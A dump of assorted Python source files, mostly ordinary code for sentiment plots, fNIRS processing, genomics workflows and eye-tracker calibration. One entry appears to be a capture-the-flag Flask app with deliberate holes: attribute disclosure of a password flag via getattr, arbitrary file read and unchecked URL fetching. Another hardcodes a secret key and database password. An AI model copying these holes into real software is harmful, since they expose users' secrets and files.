id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1642309 | import csv
import json
import os
import matplotlib.pyplot as plt
import commonfunctions as cf
import matplotlib as mpl
root_directory = os.path.abspath(os.path.dirname(os.path.abspath(os.curdir)))
directory = os.path.join(root_directory, cf.working_directory)
with open('sentiment-time-winnerloser.json', 'r') as f:
data = json.load(f)
w = [datum['year_results'] for datum in data if datum['winnerloser'] == 'w'][0]
print w
l = [datum['year_results'] for datum in data if datum['winnerloser'] == 'l'][0]
print l
winnerPositiveData = [(x['year'], x['positive'], x['word_count']) for x in w]
winnerNegativeData = [(x['year'], x['negative'], x['word_count']) for x in w]
loserPositiveData = [(x['year'], x['positive'], x['word_count']) for x in l]
loserNegativeData = [(x['year'], x['negative'], x['word_count']) for x in l]
# def weighted_average(list_of_tuples):
# assert type(list_of_tuples) == list
# assert not [True for item in list_of_tuples if type(item) != tuple]
# total = 0
# total_weights = 0
# for tuple_ in list_of_tuples:
# amount, weight = tuple_
# total += amount * weight
# total_weights += weight
# return total / total_weights
#
#
# years = list(set([x['year'] for x in w]).union([x['year'] for x in l]))
# years.sort()
#
# winnerPositiveData = []
# winnerNegativeData = []
# loserNegativeData = []
# loserPositiveData = []
#
# for year in years:
# winnerPositiveData.append(
# (year, weighted_average([(x[1], x[2]) for x in winnerPositiveData2 if x[0] == year])))
# winnerNegativeData.append(
# (year, weighted_average([(x[1], x[2]) for x in winnerNegativeData2 if x[0] == year])))
# loserPositiveData.append(
# (year, weighted_average([(x[1], x[2]) for x in loserPositiveData2 if x[0] == year])))
# loserNegativeData.append(
# (year, weighted_average([(x[1], x[2]) for x in loserNegativeData2 if x[0] == year])))
#
# print loserNegativeData
# # This bit writes to a file. Useful if you want a table of results
# with open('winnerloserDebug.csv', 'w') as f:
# dw = csv.DictWriter(f, w[0].keys())
# csv.writer(f, ['Sentiment in Republican Debates'])
# dw.writeheader()
# dw.writerows(w)
# csv.writer(f, ['Sentiment in Democrat Debates'])
# dw.writeheader()
# dw.writerows(l)
plt.style.use('ggplot')
fig = plt.figure(0)
ax = fig.gca()
ax.grid(b=False)
ax.set_axis_bgcolor('white')
labels = ['Winners', 'Losers']
colors = ['#7fbf7b', '#af8dc3']
for labelno, data in enumerate([winnerNegativeData, loserNegativeData]):
data2 = zip(*data)
ax.plot(data2[0], data2[1], color=colors[labelno], label=labels[labelno], lw=2.5)
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Proportion of words in dictionary of negative words')
ax.set_title('Negative Sentiment over time in US election debates, split by winners and losers',
fontdict={'fontsize': 13,
'fontweight': mpl.rcParams['axes.titleweight'],
'verticalalignment': 'baseline',
'horizontalalignment': 'center'},
y=1.05)
plt.savefig(os.path.join(root_directory, 'images', 'analysis-sentiment-time-winnerloser-negative.svg'), format='svg')
fig = plt.figure(1)
ax = fig.gca()
ax.grid(b=False)
ax.set_axis_bgcolor('white')
for labelno, data in enumerate([winnerPositiveData, loserPositiveData]):
data2 = zip(*data)
print data2
ax.plot(data2[0], data2[1], color=colors[labelno], label=labels[labelno], lw=2.5)
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Proportion of words in dictionary of positive words')
ax.set_title('Positive Sentiment over time in US election debates, split by winners and losers',
fontdict={'fontsize': 13,
'fontweight': mpl.rcParams['axes.titleweight'],
'verticalalignment': 'baseline',
'horizontalalignment': 'center'},
y=1.05)
plt.savefig(os.path.join(root_directory, 'images', 'analysis-sentiment-time-winnerloser-positive.svg'), format='svg')
| StarcoderdataPython |
161337 | #this code is just an example from 2018 nur luege /
from flask import Flask, request, render_template, abort
import os, requests
app = Flask(__name__)
class user:
def __init__(self, username, password):
self.username = username
self.__password = password
self.files = []
def getPass(self):
return self.__password
users = {}
users["admin"] = user("admin", os.environ["FLAG"])
def custom500(error):
return str(error), 500
@app.route("/", methods=["GET", "POST"])
def mainpage():
if request.method == "POST":
if request.form["action"] == "Login":
if request.form["username"] in users:
if request.form["password"] == users[request.form["username"]].getPass():
return render_template("index.html", user=users[request.form["username"]])
return "wrong password"
return "user does not exist"
elif request.form["action"] == "Signup":
if request.form["username"] not in users:
users[request.form["username"]] = user(request.form["username"], request.form["password"])
return render_template("index.html", user=users[request.form["username"]])
else:
return "user already exists"
elif request.form["action"] == "Add File":
return addfile()
return render_template("loggedout.html")
#beta feature for viewing info about other users - still testing
@app.route("/user/<username>", methods=['POST'])
def getInfo(username):
val = getattr(users[username], request.form['field'], None)
if val != None: return val
else: return "error"
@app.route("/files/<path:file>", methods=["GET"])
def getFile(file):
if "index.py" in file:
return "no! bad user! bad!"
return open(file, "rb").read()
def addfile():
if users[request.form["username"]].getPass() == request.form["password"]:
if request.form['url'][-1] == "/": downloadurl = request.form['url'][:-1]
else: downloadurl = request.form['url']
if downloadurl.split("/")[-1] in os.listdir("."):
return "file already exists"
file = requests.get(downloadurl, stream=True)
f = open(downloadurl.split("/")[-1], "wb")
first = True
for chunk in file.iter_content(chunk_size=1024*512):
if not first: break
f.write(chunk)
first = False
f.close()
users[request.form["username"]].files.append(downloadurl.split("/")[-1])
return render_template("index.html", user=users[request.form["username"]])
return "bad password"
if __name__ == "__main__": app.run(host="0.0.0.0")
| StarcoderdataPython |
136688 | <filename>mne/preprocessing/nirs/_beer_lambert_law.py
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import os.path as op
import re as re
import numpy as np
from scipy import linalg
from ...io import BaseRaw
from ...io.pick import _picks_to_idx
from ...io.constants import FIFF
from ...utils import _validate_type
from ..nirs import source_detector_distances
def beer_lambert_law(raw, ppf=0.1):
r"""Convert NIRS optical density data to haemoglobin concentration.
Parameters
----------
raw : instance of Raw
The optical density data.
ppf : float
The partial pathlength factor.
Returns
-------
raw : instance of Raw
The modified raw instance.
"""
raw = raw.copy().load_data()
_validate_type(raw, BaseRaw, 'raw')
freqs = np.unique(_channel_frequencies(raw))
picks = _check_channels_ordered(raw, freqs)
abs_coef = _load_absorption(freqs)
distances = source_detector_distances(raw.info)
for ii in picks[::2]:
EL = abs_coef * distances[ii] * ppf
iEL = linalg.pinv(EL)
raw._data[[ii, ii + 1]] = (raw._data[[ii, ii + 1]].T @ iEL.T).T * 1e-3
# Update channel information
coil_dict = dict(hbo=FIFF.FIFFV_COIL_FNIRS_HBO,
hbr=FIFF.FIFFV_COIL_FNIRS_HBR)
for ki, kind in enumerate(('hbo', 'hbr')):
ch = raw.info['chs'][ii + ki]
ch.update(coil_type=coil_dict[kind], unit=FIFF.FIFF_UNIT_MOL)
raw.rename_channels({
ch['ch_name']: '%s %s' % (ch['ch_name'][:-4], kind)})
return raw
def _channel_frequencies(raw):
"""Return the light frequency for each channel."""
picks = _picks_to_idx(raw.info, 'fnirs_od')
freqs = np.empty(picks.size, int)
for ii in picks:
freqs[ii] = raw.info['chs'][ii]['loc'][9]
return freqs
def _check_channels_ordered(raw, freqs):
"""Check channels followed expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
picks = _picks_to_idx(raw.info, 'fnirs_od')
for ii in picks[::2]:
ch1_name_info = re.match(r'S(\d+)_D(\d+) (\d+)',
raw.info['chs'][ii]['ch_name'])
ch2_name_info = re.match(r'S(\d+)_D(\d+) (\d+)',
raw.info['chs'][ii + 1]['ch_name'])
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(int(ch1_name_info.groups()[2]) != freqs[0]) or \
(int(ch2_name_info.groups()[2]) != freqs[1]):
raise RuntimeError('NIRS channels not ordered correctly')
return picks
def _load_absorption(freqs):
"""Load molar extinction coefficients."""
# Data from https://omlc.org/spectra/hemoglobin/summary.html
# The text was copied to a text file. The text before and
# after the table was deleted. The the following was run in
# matlab
# extinct_coef=importdata('extinction_coef.txt')
# save('extinction_coef.mat', 'extinct_coef')
#
# Returns data as [[HbO2(freq1), Hb(freq1)],
# [HbO2(freq2), Hb(freq2)]]
from scipy.io import loadmat
from scipy.interpolate import interp1d
extinction_fname = op.join(op.dirname(__file__), '..', '..', 'data',
'extinction_coef.mat')
a = loadmat(extinction_fname)['extinct_coef']
interp_hbo = interp1d(a[:, 0], a[:, 1], kind='linear')
interp_hb = interp1d(a[:, 0], a[:, 2], kind='linear')
ext_coef = np.array([[interp_hbo(freqs[0]), interp_hb(freqs[0])],
[interp_hbo(freqs[1]), interp_hb(freqs[1])]])
abs_coef = ext_coef * 0.2303
return abs_coef
| StarcoderdataPython |
1745890 | <reponame>vivin-christy/ud-catalog
import sys
sys.path.insert(0, '/var/www/catalog')
from catalog import app as application
application.secret_key = 'New secret key. Change it on server'
application.config['SQLALCHEMY_DATABASE_URI'] = (
'postgresql://'
'catalog:password@localhost/catalog')
| StarcoderdataPython |
161645 | # -*- coding: utf-8 -*
"""Implementation of the ``repeat_analysis`` step
The ``repeat_analysis`` step takes as the input the results of the ``ngs_mapping`` step
(aligned reads in BAM format) and performs repeat expansion analysis. The result are variant files
(VCF) with the repeat expansions definitions, and associated annotations (JSON).
==========
Stability
==========
This step is considered experimental, use it at your own discretion.
==========
Step Input
==========
The repeat analysis step uses Snakemake sub workflows for using the result of the ``ngs_mapping``
step.
===========
Step Output
===========
For all samples, repeat analysis will be performed on the primary DNA NGS libraries separately for
each configured read mapper and repeat analysis tool. The name of the primary DNA NGS library will
be used as an identification token in the output file.
For each read mapper, repeat analysis tool, and sample, the following files will be generated:
- ``{mapper}.{repeat_tool}.{lib_name}.vcf``
- ``{mapper}.{repeat_tool}.{lib_name}.vcf.md5``
- ``{mapper}.{repeat_tool}_annotated.{lib_name}.json``
- ``{mapper}.{repeat_tool}_annotated.{lib_name}.json.md5``
For example, it might look as follows for the example from above:
::
output/
+-- bwa.expansionhunter.P001-N1-DNA1-WES1
| `-- out
| |-- bwa.expansionhunter.P001-N1-DNA1-WES1.vcf
| |-- bwa.expansionhunter.P001-N1-DNA1-WES1.vcf.md5
+-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1
| `-- out
| |-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1.json
| |-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1.json.md5
[...]
====================
Global Configuration
====================
Not applicable.
=====================
Default Configuration
=====================
The default configuration is as follows:
.. include:: DEFAULT_CONFIG_repeat_expansion.rst
===============================
Available Repeat Analysis Tools
===============================
The following germline repeat analysis tool is currently available:
- ``"ExpansionHunter"``
==================
Parallel Execution
==================
Not available.
"""
from collections import OrderedDict
import os
from biomedsheets.shortcuts import KEY_SEX, GermlineCaseSheet, is_not_background
from snakemake.io import expand
from snappy_pipeline.base import UnsupportedActionException
from snappy_pipeline.utils import dictify, listify
from snappy_pipeline.workflows.abstract import BaseStep, BaseStepPart, LinkOutStepPart
from snappy_pipeline.workflows.ngs_mapping import NgsMappingWorkflow
from snappy_pipeline.workflows.repeat_expansion.annotate_expansionhunter import (
AnnotateExpansionHunter,
)
#: Extensions of files to create as main payload - JSON.
EXT_JSON = (".json", ".json.md5")
#: Extensions of files to create as main payload - VCF.
EXT_VCF = (".vcf", ".vcf.md5")
#: Default configuration for the repeat_expansion step.
DEFAULT_CONFIG = r"""
# Default configuration repeat_expansion
step_config:
repeat_expansion:
# Repeat expansions definitions - used in ExpansionHunter call
repeat_catalog: REQUIRED
# Repeat expansions annotations, e.g., normality range - custom file
repeat_annotation: REQUIRED
# Path to the ngs_mapping step
path_ngs_mapping: ../ngs_mapping
"""
class ExpansionHunterStepPart(BaseStepPart):
"""Repeat expansion analysis with Illumina::ExpansionHunter"""
#: Step name.
name = "expansionhunter"
#: Valid actions.
actions = ("run", "annotate")
def __init__(self, *args, **kwargs):
"""Constructor."""
super().__init__(*args, **kwargs)
#: Build shortcut from library name to sex
self.library_name_to_sex = OrderedDict()
for sheet in self.parent.shortcut_sheets:
self.library_name_to_sex.update(self._library_name_to_sex(sheet))
@staticmethod
def _library_name_to_sex(sheet):
"""Library name to sex.
:param sheet: Sample sheet.
:type sheet: biomedsheets.shortcuts.GermlineCaseSheet
:return: Yields (library name, sex).
"""
for donor in sheet.donors:
sex = donor.extra_infos.get(KEY_SEX)
for bio_sample in donor.bio_samples.values():
for test_sample in bio_sample.test_samples.values():
for ngs_library in test_sample.ngs_libraries.values():
yield ngs_library.name, sex
def get_input_files(self, action):
"""Return input function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns input function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
# Return requested function
return getattr(self, "_get_input_files_{}".format(action))
def get_output_files(self, action):
"""Return output function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns output function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
return getattr(self, "_get_output_files_{}".format(action))()
def get_log_file(self, action):
"""Return log function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns log function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
return getattr(self, "_get_log_files_{}".format(action))()
@listify
def _get_input_files_run(self, wildcards):
"""Yield BAM files based on subworkflow `ngs_mapping` results.
:param wildcards: Snakemake rule wildcards.
:type wildcards: snakemake.io.Wildcards
"""
ngs_mapping = self.parent.sub_workflows["ngs_mapping"]
bam_tpl = "output/{mapper}.{library_name}/out/{mapper}.{library_name}.bam"
yield ngs_mapping(bam_tpl.format(**wildcards))
@staticmethod
@listify
def _get_input_files_annotate(_wildcards):
"""Yield input files' pattern for rule `annotate` - based on ExpansionHunter call results.
:param _wildcards: Snakemake rule wildcards (unused).
:type _wildcards: snakemake.io.Wildcards
"""
name_pattern = "{mapper}.expansionhunter.{library_name}"
yield "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext="json"
)
@staticmethod
@dictify
def _get_output_files_run():
"""Yield output files' patterns for rule `run` - ExpansionHunter call."""
# Initialise variables
name_pattern = "{mapper}.expansionhunter.{library_name}"
ext_dict = {"json": "json", "vcf": "vcf", "vcf_md5": "vcf.md5"}
# Yield
for key, ext in ext_dict.items():
yield key, "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext=ext
)
@staticmethod
@dictify
def _get_output_files_annotate():
"""Yield output files' patterns for rule `annotate`."""
# Initialise variables
name_pattern = "{mapper}.expansionhunter_annotated.{library_name}"
ext_dict = {"json": "json", "json_md5": "json.md5"}
# Yield
for key, ext in ext_dict.items():
yield key, "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext=ext
)
@staticmethod
def _get_log_files_run():
"""
:return: Returns log file pattern for rule `run` - ExpansionHunter call.
"""
name_pattern = "{mapper}.expansionhunter.{library_name}"
return "work/{name_pattern}/log/{name_pattern}.log".format(name_pattern=name_pattern)
def get_params(self, action):
"""Get parameters.
:param action: Action, i.e., step being performed.
:type action: str
:return: Returns method to get donor's sex.
"""
assert action == "run", "Parameters is only available for action 'run'."
return self._get_donor_sex
def _get_donor_sex(self, wildcards):
"""Get donor's sex.
:param wildcards: Snakemake wildcards associated with rule (unused).
:type wildcards: snakemake.io.Wildcards
:return: Returns donor's sex as found in sample sheet: 'female', 'male' or 'unknown'.
"""
return {"sex": self.library_name_to_sex[wildcards.library_name]}
def annotate_results(self, _wildcards, sm_input, sm_output):
"""Annotate/Explain ExpansionHunter results.
:param _wildcards: Snakemake wildcards associated with rule (unused).
:type _wildcards: snakemake.io.Wildcards
:param sm_input: Snakemake input associated with rule.
:type sm_input: snakemake.io.Namedlist
:param sm_output: Snakemake output associated with rule.
:type sm_output: snakemake.io.Namedlist
"""
# Absolute path from input and output
input_path = os.path.join(os.getcwd(), str(sm_input))
output_path = os.path.join(os.getcwd(), sm_output.json)
# Annotate
AnnotateExpansionHunter(
eh_json=input_path,
annotation_json=self.config["repeat_annotation"],
output_path=output_path,
).run()
class RepeatExpansionWorkflow(BaseStep):
"""Perform germline repeat expansion analysis."""
#: Workflow name
name = "repeat_expansion"
#: Sample sheet shortcut class
sheet_shortcut_class = GermlineCaseSheet
def __init__(
self, workflow, config, cluster_config, config_lookup_paths, config_paths, workdir
):
super().__init__(
workflow,
config,
cluster_config,
config_lookup_paths,
config_paths,
workdir,
(NgsMappingWorkflow,),
)
# Register sub step classes so the sub steps are available
self.register_sub_step_classes((LinkOutStepPart, ExpansionHunterStepPart))
# Register sub workflows
self.register_sub_workflow("ngs_mapping", self.config["path_ngs_mapping"])
@classmethod
def default_config_yaml(cls):
"""Return default config YAML, to be overwritten by project-specific one"""
return DEFAULT_CONFIG
@listify
def _all_donors(self, include_background=True):
"""Return list of all donors in sample sheet."""
sheets = self.shortcut_sheets
if not include_background:
sheets = list(filter(is_not_background, sheets))
for sheet in sheets:
for pedigree in sheet.cohort.pedigrees:
yield from pedigree.donors
@listify
def get_result_files(self):
"""Return list of result files for the germline repeat expansion analysis workflow."""
# Initialise variable
tools = ("expansionhunter",)
# Yield the JSON annotated results files
name_pattern = "{mapper}.{tool}_annotated.{donor.dna_ngs_library.name}"
yield from self._yield_result_files(
os.path.join("output", name_pattern, "out", name_pattern + "{ext}"),
mapper=self.w_config["step_config"]["ngs_mapping"]["tools"]["dna"],
tool=tools,
ext=EXT_JSON,
)
# Yield the VCF results files
name_pattern = "{mapper}.{tool}.{donor.dna_ngs_library.name}"
yield from self._yield_result_files(
os.path.join("output", name_pattern, "out", name_pattern + "{ext}"),
mapper=self.w_config["step_config"]["ngs_mapping"]["tools"]["dna"],
tool=tools,
ext=EXT_VCF,
)
def _yield_result_files(self, tpl, **kwargs):
"""Build output paths from path template and extension list."""
for donor in self._all_donors(include_background=False):
if donor.dna_ngs_library: # ignores samples without DNA library
yield from expand(tpl, donor=[donor], **kwargs)
def check_config(self):
"""Check that the necessary configuration is available for the step"""
# Requires path to ngs_mapping output, i.e., the BAM files
self.ensure_w_config(
config_keys=("step_config", "repeat_expansion", "path_ngs_mapping"),
msg="Path to NGS mapping not configured but required for repeat expansion analysis.",
)
# Requires path to reference genome FASTA
self.ensure_w_config(
config_keys=("static_data_config", "reference", "path"),
msg=(
"Path to reference FASTA not configured but required "
"for repeat expansion analysis."
),
)
| StarcoderdataPython |
101184 | from flask import Flask, render_template
from subprocess import call
app = Flask(__name__)
SENDER_CONFIG = '10101'
SEND_CONFIG = ['-u', '-s']
RECEIVER = {
'A': '1',
'B': '2',
'C': '3',
'D': '4',
}
STATES = {
'on':'1',
'off':'0'
}
def send_signal(receiver, state):
call(['./send', SENDER_CONFIG, *SEND_CONFIG, receiver, state])
@app.route('/')
def index():
return render_template('index.html')
@app.route('/on/', methods=['POST'])
def on_all():
for _, value in RECEIVER.items():
send_signal(value, STATES['on'])
return 'all on'
@app.route('/off/', methods=['POST'])
def off_all():
for _, value in RECEIVER.items():
send_signal(value, STATES['off'])
return 'all off'
@app.route('/receiver/<receiver_id>/<state_id>/', methods=['POST'])
def switch(receiver_id, state_id):
if receiver_id not in RECEIVER.keys():
return '{} not in {}'.format(receiver_id, RECEIVER.keys()), 400
elif state_id not in STATES.keys():
return '{} not in {}'.format(state_id, STATES.keys()), 400
else:
send_signal(RECEIVER[receiver_id], STATES[state_id])
return '{} {}'.format(receiver_id, state_id)
| StarcoderdataPython |
20978 | import csv
import json
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
formats = ['png', 'pdf', 'svg', 'eps']
metrics = [
{'gmetric': 'groc', 'lmetric': 'lroc', 'metric': 'AUC'},
{'gmetric': 'gauc', 'lmetric': 'lauc', 'metric': 'PRAUC'},
]
datasets = [
{'name': 'HCC', 'file': '../../results/evaluation/hcc_multi_sites_100_each.csv'},
{'name': 'ILPD', 'file': '../../results/evaluation/ilpd_multi_sites_100_each.csv'},
{'name': 'LTD', 'file': '../../results/evaluation/tumor_multi_sites_100_each.csv'},
{'name': 'BCD', 'file': '../../results/evaluation/diag_multi_sites_100_each.csv'},
]
for metric in metrics:
gmetric = metric['gmetric']
lmetric = metric['lmetric']
metric = metric['metric']
for ds in datasets:
file = ds['file']
name = ds['name']
title = f'{name} | Multiple Local Models'
stats = {}
xs = ['1', '2', '5', '10', '20', '50', '100']
with open(file, newline='') as csvfile:
data = csv.reader(csvfile, delimiter=';')
headers = next(data)
gauc_idx = headers.index(gmetric)
lauc_idx = headers.index(lmetric)
for row in data:
stat = stats.get(row[1])
if not stat:
stat = {
gmetric: [],
lmetric: [],
}
stats[row[1]] = stat
# xs.append(row[1])
gvals = json.loads(row[gauc_idx])
lvals = json.loads(row[lauc_idx])
stat[gmetric].append(gvals)
if len(lvals) > 0:
stat[lmetric].extend(lvals)
else:
stat[lmetric].append(gvals)
# datainfo = str(len(stats['100'][gmetric]))
# title += ' | ' + datainfo
y_gauc_median = [np.median(stats[x][gmetric]) for x in xs]
y_gauc_q25 = [np.quantile(stats[x][gmetric], 0.25) for x in xs]
y_gauc_q75 = [np.quantile(stats[x][gmetric], 0.75) for x in xs]
y_lauc_median = [np.median(stats[x][lmetric]) for x in xs]
y_lauc_q25 = [np.quantile(stats[x][lmetric], 0.25) for x in xs]
y_lauc_q75 = [np.quantile(stats[x][lmetric], 0.75) for x in xs]
xs = [int(x) for x in xs]
regular_col = '#b0b0b0'
global_col = '#424ef5'
local_col = '#f57542'
alpha_mean = 1.0
alpha_q = 0.25
alpha_area = 0.2
fig = plt.figure(figsize=(6, 4.5))
ax = fig.add_subplot()
ax.hlines(y_gauc_q25[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.hlines(y_gauc_median[0], 1, 100, label='Centralized', colors=[regular_col])
ax.hlines(y_gauc_q75[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.fill_between(xs, y_gauc_q25, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_gauc_q75, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q25, y_lauc_median, color=local_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q75, y_lauc_median, color=local_col, alpha=alpha_area)
ax.plot(xs, y_gauc_q25, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_gauc_median, '.', label='Combined', color=global_col, alpha=alpha_mean)
ax.plot(xs, y_gauc_q75, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_lauc_q25, '_', color=local_col, alpha=alpha_q)
ax.plot(xs, y_lauc_median, '.', label='Local', color=local_col, alpha=alpha_mean)
ax.plot(xs, y_lauc_q75, '_', color=local_col, alpha=alpha_q)
plt.yticks([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
plt.xscale('log')
plt.xticks([1, 2, 5, 10, 20, 50, 100], ['Centralized', '2', '5', '10', '20', '50', '100'])
plt.ylabel(metric)
plt.xlabel('Number of Sites')
plt.legend()
plt.title(title)
for format in formats:
plt.savefig(f'../../results/plots/{name}_{metric}_sites.{format}', format=format, bbox_inches='tight')
| StarcoderdataPython |
1739707 |
class LaplaceSmoother(object):
'''
Add delta smoothing algorithme module
'''
def __init__(self, delta=1):
self.delta = delta
def smooth(self, counter, words):
'''
return P(w_n | w_1, w_2, ... w_n-1) = C(w_n | w_1, w_2, ... w_n-1) + delta / C(w_1, w_2, ... w_n-1) + |V| * delta.
when C(w_1, w_2, ... w_n-1) is zero, P(w_n | w_1, w_2, ... w_n-2) is used.
'''
query = words[:-1]
befores = counter.search(query)
if len(befores) == 0:
return self.smooth(counter, query)
try:
b = counter.search(words)
count = b["count"]
except:
count = 0
count += self.delta
return count / (befores["count"] + self.delta * befores["child_num"])
| StarcoderdataPython |
3210924 | <reponame>PeterWolf93/PupilLabs_VR_Calibration<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 07:26:07 2018
@author: <NAME>
title: start_calib
"""
#%% Imports
import numpy as np
from calib_main import calib_main
from load_pickle import load_pickle
#%% Version number
version_num = 'V9'
#%% data path
directory = 'F:\\Arbeit und Uni\\MasterArbeit\\'
# path to the pupil capture data
data_directory = directory + 'Pupil_VR_Recordings\\'
# path to the calibration data from the stimulus script
time_directory = directory + 'HTC_Vive_Recs\\Data\\'
#%% Configurations
disp_plots = 1
# 1. uncalibrated data; 2. GT after calibration
disp_what = [1, 1, 0]
# atm calculated data can't be saved
save_data = 0
# forst check the save directory for the plots
save_plots = 0
#%% choose data set
choose_dataset = 0
if choose_dataset == 0:
# specify the recording you want to calibrate
subj_name = 'olbe'
file_date = '2018_11_20'
file_num = '001'
# capture frequency in Hz
set_fps = 120
# left; right; both
use_eye = 'both'
#%% load calibration times from pickle file
mask_ind_cal,mask_ind_val = load_pickle(time_directory,subj_name,file_date,file_num)
#%% extract calibration grid
gt_px = mask_ind_cal[:,3:5]
#%% specify dots for calibration and validation
cal_dots = np.linspace(1,np.size(gt_px,0),np.size(gt_px,0));
val_dots = np.linspace(1,np.size(gt_px,0),np.size(gt_px,0));
#%% choose coefficents for design matrix
choose_coeff = 1
if choose_coeff == 1:
coeff_num_all = 6
cal_form_all_x = [['1','x','y','x^2','y^2','x*y']]
cal_form_all_y = [['1','x','y','x^2','y^2','x*y']]
cal_form_all = [cal_form_all_x, cal_form_all_y]
#%% screen resolutions
screen_width = np.nan
screen_height = np.nan
screen_dist = 1
#%% shorten input data and configs
class CalibConfig(object):
def __init__(self, disp_plots, disp_what, save_data, save_plots):
self.disp_plots = disp_plots
self.disp_what = disp_what
self.save_data = save_data
self.save_plots = save_plots
fct_cfg = CalibConfig(disp_plots, disp_what, save_data, save_plots)
class CalibInputValue(object):
def __init__(self, coeff_num_all, cal_form_all, version_num, data_directory,
time_directory, subj_name, file_date, file_num, mask_ind_cal,
mask_ind_val, cal_dots, val_dots, gt_px, set_fps, use_eye):
self.coeff_num_all = coeff_num_all
self.cal_form_all = cal_form_all
self.version_num = version_num
self.data_directory = data_directory
self.time_directory = time_directory
self.subj_name = subj_name
self.file_date = file_date
self.file_num = file_num
self.mask_ind_cal = mask_ind_cal
self.mask_ind_val = mask_ind_val
self.cal_dots = cal_dots
self.val_dots = val_dots
self.gt_px = gt_px
self.set_fps = set_fps
self.use_eye = use_eye
fct_in = CalibInputValue(coeff_num_all, cal_form_all, version_num, data_directory,
time_directory, subj_name, file_date, file_num, mask_ind_cal,
mask_ind_val, cal_dots, val_dots, gt_px, set_fps, use_eye)
class ScreenConfig(object):
def __init__(self, screen_width, screen_height, screen_dist):
self.screen_width = screen_width
self.screen_height = screen_height
self.screen_dist = screen_dist
screen_cfg = ScreenConfig(screen_width, screen_height, screen_dist)
#%% Output
fct_out = calib_main(fct_cfg,fct_in,screen_cfg) | StarcoderdataPython |
3312641 | <gh_stars>0
#!/usr/bin/python3
# parse.py
#
# <NAME> 28-Dec-2021
#
# Copyright (C) Randix LLC. All rights reserved.
#
# This reads from the serial port and parses the data from the
# microwizard.com Fast Track Model K2
#
# output the raw data to the file "raw.log"
# output the parsed data to "times.csv"
import os
import serial
import time
ser = None
#serialPort = '/dev/tty.usbserial-110' # macOS 12.1
serialPort = '/dev/ttyUSB0' # linux RPi
raw = None # file descriptor
rawLog = 'raw.log'
# display character, and get to disk
def display(c):
raw.write(c)
raw.flush() # push the char to the OS
os.fsync(raw) # push to disk
print(c, end='')
if c == '>':
print()
def initSerial():
global raw, ser
# Open Serial Port
try:
ser = serial.Serial(port=serialPort,
baudrate=9600,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS)
raw = open(rawLog, 'a')
return True
except:
print('No serial port!')
return False
def parseTrack(track):
timeVal = float(track.split('=')[1][:6])
if len(track) > 8: # we have a time and place
place = track[8]
else:
place = '0' # no place
if place == '!':
place = '1'
elif place == '"':
place = '2'
elif place == '#':
place = '3'
elif place == '$':
place = '4'
return place, timeVal
def parseSerial(trackCars):
#print(trackCars)
line = ''
c = ''
ready = False
while not ready:
# Get the timer output
while ser.inWaiting() > 0:
c = ser.read(1).decode('utf-8')
display(c)
if c == '@' or c == '>':
continue
line += c
if c == '\r':
ready = True
break
#print('Parse...', line)
tracks = line.split()
line = ''
c = ''
#print(tracks, len(tracks))
result = []
for i in range(len(trackCars)):
place, timeVal = parseTrack(tracks[i])
print(i, place, timeVal)
result.append([trackCars[i], place, timeVal])
print(result)
return result
#-----------------
if __name__ == '__main__':
if initSerial():
while True:
parseSerial(["42", "32", "12", "1"])
| StarcoderdataPython |
73800 | # coding: utf8
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import pprint
import cv2
import argparse
import numpy as np
import paddle.fluid as fluid
